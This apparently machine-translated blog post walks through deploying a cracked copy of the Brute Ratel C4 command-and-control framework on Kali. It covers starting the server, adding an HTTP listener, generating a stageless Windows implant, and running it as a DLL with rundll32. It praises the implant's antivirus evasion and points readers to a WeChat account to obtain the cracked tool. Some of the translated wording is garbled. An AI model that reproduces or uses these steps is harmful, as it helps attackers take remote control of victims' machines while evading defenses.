In the previous article, we mentioned many C2 framework tools. Such as CS viper, etc. Today I will share with you another fun tool, Brute Ratel C4

Deployment

. After downloading, unzip the file in kali.

Installation environment and certificate (can be omitted)

Enter the adhoc_scripts directory to run, install the environment and generate the certificate

chmod +x install.sh

chmod +x genssl.sh

./install.sh

./genssl.sh

Next, give brute-ratel-linx64_crack and lib64/commander permissions respectively

chmod +x brute-ratel-linx64_crack

chmod +x lib64/commander

Next, start the server./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem After execution, copy the generated key.pem and cert.pem to the tool directory.

Parameter description: -a Username -p Login password Next, we start the client chmod +x Rungui.sh # Add permissions to the client

./Rungui.sh

Modify your port, account password and other information. After you finish, click on the avatar to log in.

Add listener

Like tools such as cs, we will create a new listener. Click C4 Profiler - Add http Listener

The parameter configuration example is as follows:

Note: sleep and jitter are similar to the delay time of CS. They can be adjusted down. After the last line is checked at the end, if the Mazi does not go online at once, it will not be requested.

Generate shell

Click save to get a listener. Right-click this listener and select Stageless to generate the corresponding structure of the horse.

But for some reason, after the author generates the exe file, he cannot get the shell on the Windows 11 system. Helplessly generated the dll file.

rundll32 kali.dll,main

At present, the kill-free effect is quite good.

Related Operations

Of course, there are many fun features. We will update it for you in later articles!

Summary

Advantages: It is very friendly to kill without killing, similar to tools such as CSS, and the entry threshold is low.

Deficiencies: Currently only Windows Payload is supported. I hope to add payloads on other platforms later.

Get the tool, follow the WeChat official account kali notes backend reply (C4)